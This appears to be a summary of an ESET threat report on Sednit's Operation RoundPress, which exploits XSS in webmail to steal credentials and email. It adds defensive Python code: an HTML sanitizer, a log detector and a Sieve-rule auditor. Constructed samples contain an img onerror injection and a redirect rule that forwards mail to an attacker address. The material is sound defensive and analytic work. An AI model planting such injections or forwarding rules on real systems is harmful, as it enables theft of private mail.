Operation RoundPress targeting high-value webmail servers

This blog post presents Operation RoundPress, a campaign that targets high-value webmail servers through XSS vulnerabilities and that ESET attributes, with medium confidence, to the Sednit cyberespionage group. The main objective of the operation is to steal sensitive data from specific email accounts.

Key points highlighted in this post include:

– Operation RoundPress utilizes spearphishing emails to exploit XSS vulnerabilities and inject malicious JavaScript code into the victim’s webmail page.
– Initially targeting Roundcube in 2023, the operation expanded in 2024 to include other webmail software such as Horde, MDaemon, and Zimbra.
– Sednit employed a zero-day XSS vulnerability for MDaemon, which was reported and subsequently patched in version 24.5.1.
– The majority of victims are governmental entities and defense companies in Eastern Europe, with additional targets in Africa, Europe, and South America.
– Detailed analysis is provided on various JavaScript payloads used in the operation, capable of stealing webmail credentials and exfiltrating contacts and email messages.
– One of the payloads, SpyPress.MDAEMON, can bypass two-factor authentication.

The blog also delves into the profile of the Sednit group, their history of cyber operations, and the linkages to past incidents such as the DNC hack and the WADA email leak.

Furthermore, the post outlines the compromise chain of Operation RoundPress, detailing how Sednit exploits XSS vulnerabilities in webmail software to execute malicious JavaScript code. Examples of phishing emails used by the group to lure targets into opening the malicious code are provided, along with an overview of the compromise chain.

Lastly, the post mentions that Sednit used an old vulnerability against targets running Horde webmail, although the specific exploit remains unidentified. Placing JavaScript in the onerror attribute of an img element is a common XSS technique. In the Horde Webmail case, the attempt did not work as intended because the XSS filter in version 1.0 blocked it.

In the case of MDaemon Email Server, Sednit exploited a zero-day XSS vulnerability in an email sent to Ukrainian defense companies. The vulnerability was reported to the developers, patched in version 24.5.1, and assigned CVE-2024-11182.

Similarly, Sednit targeted Roundcube webmail with the CVE-2023-43770 vulnerability, which was patched in a GitHub commit. The exploit allowed for the execution of JavaScript code within the email when rendered in Roundcube.

For Zimbra, Sednit used the CVE-2024-27443 vulnerability, which was patched in a GitHub commit. The exploit involved executing JavaScript code contained in the X-Zimbra-Calendar-Intended-For header of a calendar invitation email.
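Every case in this chain comes down to the webmail client rendering attacker-controlled HTML with script still in it. As an added, defender-side example (not code from the ESET post or from any of the webmail projects), the following Python sanitizer shows the class of filtering a webmail client has to apply before rendering an HTML message: it removes every inline event-handler attribute such as onerror, strips URL attributes that carry a javascript: or data: scheme, and drops script-bearing elements with their content. It goes beyond the img/onerror case the post names to cover the other handler attributes and URL schemes that behave the same way. The sample message and the EXAMPLE_HANDLER name are constructed placeholders.

```python
from html import escape
from html.parser import HTMLParser

# Attributes that take a URL: a javascript: (or data:) scheme there also runs script.
URL_ATTRS = {"src", "href", "action", "formaction", "background", "xlink:href"}
# Elements a webmail client should never render from a remote sender.
BLOCKED_TAGS = {"script", "iframe", "object", "embed", "meta", "link", "base", "form", "svg", "math"}
BLOCKED_SCHEMES = ("javascript:", "vbscript:", "data:")


class EmailHtmlSanitizer(HTMLParser):
    """Rebuilds an HTML fragment, dropping inline event handlers (on*),
    script-bearing URL schemes and blocked elements together with their content."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []   # (tag, attribute-or-None) that was removed; useful for alerting
        self._skip = 0      # nesting depth inside a blocked element

    def _clean_attrs(self, tag, attrs):
        kept = []
        for name, value in attrs:
            lname = name.lower()
            if lname.startswith("on"):            # onerror, onload, onmouseover, ...
                self.dropped.append((tag, lname))
                continue
            if lname in URL_ATTRS and value is not None:
                # Collapse whitespace so "java\nscript:" is not missed.
                norm = "".join(value.split()).lower()
                if norm.startswith(BLOCKED_SCHEMES):
                    self.dropped.append((tag, lname))
                    continue
            kept.append((lname, value))
        return kept

    def _emit(self, tag, attrs, self_closing):
        parts = [tag]
        for name, value in attrs:
            parts.append(name if value is None else f'{name}="{escape(value, quote=True)}"')
        self.out.append("<" + " ".join(parts) + (" />" if self_closing else ">"))

    def handle_starttag(self, tag, attrs):
        if tag in BLOCKED_TAGS:
            self._skip += 1
            self.dropped.append((tag, None))
        elif not self._skip:
            self._emit(tag, self._clean_attrs(tag, attrs), False)

    def handle_startendtag(self, tag, attrs):
        if tag in BLOCKED_TAGS:
            self.dropped.append((tag, None))
        elif not self._skip:
            self._emit(tag, self._clean_attrs(tag, attrs), True)

    def handle_endtag(self, tag):
        if tag in BLOCKED_TAGS:
            self._skip = max(0, self._skip - 1)
        elif not self._skip:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data, quote=False))


def sanitize_email_html(fragment):
    """Return (clean_html, dropped) for an HTML email body."""
    p = EmailHtmlSanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out), p.dropped


# Constructed sample: a benign image plus the img/onerror pattern described in the post
# and a javascript: link with a newline inside the scheme. EXAMPLE_HANDLER is a placeholder.
SAMPLE = ('<p>Quarterly report attached.</p>'
          '<img src="https://example.invalid/logo.png" alt="logo">'
          '<img src="x" onerror="EXAMPLE_HANDLER()">'
          '<a href="java\nscript:EXAMPLE">link</a>')

if __name__ == "__main__":
    clean, dropped = sanitize_email_html(SAMPLE)
    print(clean)
    print(dropped)
```

The `dropped` list is worth logging: a message that arrives with event handlers or script elements at all is a signal in its own right, and it was the signal that Horde's filter acted on.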

The JavaScript payloads used by Sednit have no true persistence; they are simply reloaded each time the victim opens the malicious email. They can steal webmail credentials and exfiltrate data to a hardcoded C&C server via HTTP POST requests.

Sednit used four payloads in Operation RoundPress in 2024, targeting webmail instances with XSS vulnerabilities. The payloads are obfuscated, with encrypted strings for the webmail and C&C server URLs. They communicate with C&C servers via HTTP POST requests and have no persistence or update mechanism. SpyPress.HORDE, for example, steals credentials by creating hidden input elements and exfiltrates the data via HTTPS POST requests. Finally, it gets the content of each email by fetching https:///?_task=mail&_action=read&_mbox=&_uid=&_refresh=1&_remote=1. The email content is then exfiltrated to the C&C server with the message type mail-.

Malicious Sieve rules
SpyPress.ROUNDCUBE adds malicious Sieve rules to the victim’s account, as shown in Figure 19. These rules automatically forward incoming emails to an external email address chosen by the attackers. This enables attackers to maintain access to the victim’s emails even after they change their password.

Figure 19. SpyPress.ROUNDCUBE adds malicious Sieve rules

Network protocol
SpyPress.ROUNDCUBE uses the same network protocol as SpyPress.HORDE and SpyPress.MDAEMON. Note that SpyPress.ROUNDCUBE adds the HTTP header X-Roundcube-Request, which carries the CSRF token that Roundcube checks on such requests. Also note that the script we reviewed has a hardcoded lower time limit of 6:02:03 am, October 1st, 2024: only emails more recent than this timestamp are extracted.

The email source of each message is obtained from https:///?_task=mail&_mbox=&_uid=&_action=viewsource and then sent to the C&C server for further analysis.

If SpyPress.ROUNDCUBE has extracted more than 150 emails in a row, it pauses the extraction until the next scheduled run (two hours later), presumably to limit network noise and avoid detection.
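The viewsource fetches and the 150-message batching described above give a defender something concrete to hunt for in the webmail server's access log. The following Python script is an added example, not part of the post and not ESET's or Roundcube's code, and the log lines it runs over are constructed: it parses combined-format access log entries, keeps a sliding window per client of requests with _action=viewsource, and raises one alert when a single client has pulled the raw source of 20 or more distinct messages inside ten minutes. The threshold and window are assumptions to tune per site; a human reading raw headers does it a few times a day, not dozens of times a minute.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlsplit

# Combined-format access log line (Apache/nginx style); only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Extract client IP, timestamp and the Roundcube _task/_action/_uid parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    qs = parse_qs(urlsplit(m["path"]).query)

    def first(key):
        return qs.get(key, [""])[0]

    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "task": first("_task"),
        "action": first("_action"),
        "uid": first("_uid"),
    }


def detect_viewsource_bursts(lines, threshold=20, window_seconds=600):
    """Alert once per client that fetches the raw source of `threshold` or more
    distinct messages within a sliding window of window_seconds."""
    recent = defaultdict(deque)   # ip -> deque of (timestamp, uid), oldest first
    alerted, alerts = set(), []
    for line in lines:
        ev = parse_line(line)
        if not ev or ev["task"] != "mail" or ev["action"] != "viewsource":
            continue
        dq = recent[ev["ip"]]
        dq.append((ev["ts"], ev["uid"]))
        while (ev["ts"] - dq[0][0]).total_seconds() > window_seconds:
            dq.popleft()
        distinct = {uid for _, uid in dq}
        if len(distinct) >= threshold and ev["ip"] not in alerted:
            alerted.add(ev["ip"])
            alerts.append({"ip": ev["ip"], "distinct_uids": len(distinct),
                           "first": dq[0][0], "last": ev["ts"]})
    return alerts


# --- Constructed sample log (not real traffic) -------------------------------
def _line(ip, ts, uid, action="viewsource"):
    stamp = ts.strftime("%d/%b/%Y:%H:%M:%S %z")
    return (f'{ip} - - [{stamp}] "GET /?_task=mail&_mbox=INBOX&_uid={uid}&_action={action} HTTP/1.1" '
            f'200 8123 "https://mail.example.invalid/?_task=mail" "Mozilla/5.0"')


_BASE = datetime(2024, 10, 2, 9, 0, 0, tzinfo=timezone.utc)
SAMPLE_LOG = (
    # an analyst looking at three raw messages over an hour: benign
    [_line("203.0.113.10", _BASE + timedelta(minutes=20 * i), 4400 + i) for i in range(3)]
    # a scripted client pulling 25 distinct messages in under a minute: suspicious
    + [_line("198.51.100.7", _BASE + timedelta(seconds=2 * i), 9000 + i) for i in range(25)]
    # an ordinary read of a message: not viewsource, ignored
    + [_line("203.0.113.10", _BASE + timedelta(minutes=5), 4400, action="show")]
)

if __name__ == "__main__":
    for a in detect_viewsource_bursts(SAMPLE_LOG):
        print(f"{a['ip']}: {a['distinct_uids']} raw message fetches "
              f"between {a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}")
```

Because the payload runs in the victim's own browser session, the client IP and session cookie in these hits are the victim's; the point of the rule is the rate and the action, not the source address. The two-hour cadence the post describes suggests a second, longer-window variant of the same count.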

Moreover, some versions of SpyPress.ROUNDCUBE implement malicious Sieve rules. These rules copy every incoming email to a specified email address controlled by the attacker, like srezoska@skiff[.]com. Skiff was known for its privacy-focused email services and end-to-end encryption.
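Both Sieve passages above (the rules shown in Figure 19 and the copy-to-external-address variant) reduce to one check an administrator can run over every user's active Sieve script: find redirect actions and flag targets that are known-bad or outside the organisation's own domains. The Python auditor below is an added example, not ESET's tooling and not Roundcube's managesieve code; the corp.example domain, the sample script and the small regex grammar it accepts are assumptions, and the one known-bad entry is the address named in this post.

```python
import re

# Assumptions for this example: the organisation's own mail domains, and an IoC list.
ALLOWED_DOMAINS = {"corp.example"}
KNOWN_BAD_ADDRESSES = {"srezoska@skiff.com"}   # address named in the report (defanged there as skiff[.]com)

# Matches:  redirect [:tag ...] "addr"   or   redirect [:tag ...] ["a", "b"]
REDIRECT_RE = re.compile(r'\bredirect\b((?:\s+:\w+)*)\s+(\[[^\]]*\]|"[^"]*")', re.IGNORECASE)
QUOTED_RE = re.compile(r'"([^"]*)"')


def strip_comments(script):
    """Drop '#' line comments (Roundcube writes '# rule:[name]' headers) and /* */ blocks.
    Simplification: a '#' inside a quoted string would also be cut."""
    script = re.sub(r'/\*.*?\*/', '', script, flags=re.DOTALL)
    return "\n".join(line.split("#", 1)[0] for line in script.splitlines())


def audit_sieve(script):
    """Return one finding per redirect target that is a known-bad address or
    points outside ALLOWED_DOMAINS. ':copy' is recorded because it leaves the
    original in the inbox, which is what keeps the forwarding unnoticed."""
    findings = []
    for m in REDIRECT_RE.finditer(strip_comments(script)):
        tags = {t.lower() for t in m.group(1).split()}
        for addr in QUOTED_RE.findall(m.group(2)):
            domain = addr.rsplit("@", 1)[-1].lower()
            if addr.lower() in KNOWN_BAD_ADDRESSES:
                reason = "known-bad address"
            elif domain not in ALLOWED_DOMAINS:
                reason = "external domain"
            else:
                continue
            findings.append({"address": addr, "copy": ":copy" in tags, "reason": reason})
    return findings


# Constructed sample script in the layout Roundcube's managesieve plugin writes.
SAMPLE_SIEVE = '''# rule:[Newsletters]
if header :contains "subject" "newsletter"
{
    fileinto "Newsletters";
}
# rule:[Backup]
if true
{
    redirect :copy "srezoska@skiff.com";
}
# rule:[Shared archive]
if address :is "from" "boss@corp.example"
{
    redirect "archive@corp.example";
}
'''

if __name__ == "__main__":
    for f in audit_sieve(SAMPLE_SIEVE):
        print(f"{f['reason']}: redirect{' :copy' if f['copy'] else ''} to {f['address']}")
```

Run it against scripts pulled from the Sieve store (for Dovecot, the user's active script under the sieve directory) rather than through the webmail UI, since the rule was planted through that same UI. A match on an unconditional `if true` rule with `:copy` is the exact shape the post describes.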

On the other hand, SpyPress.ZIMBRA, a JavaScript payload injected into vulnerable Zimbra webmail instances, shares similar functionalities with previous payloads. It can steal credentials, extract contacts and settings, and exfiltrate email messages.

For any questions related to our research on WeLiveSecurity, reach out to us at threatintel@eset.com. ESET Research also provides private APT intelligence reports and data feeds, accessible through the ESET Threat Intelligence page.

If you are interested in a detailed list of indicators of compromise (IoCs) and samples, please refer to our GitHub repository.
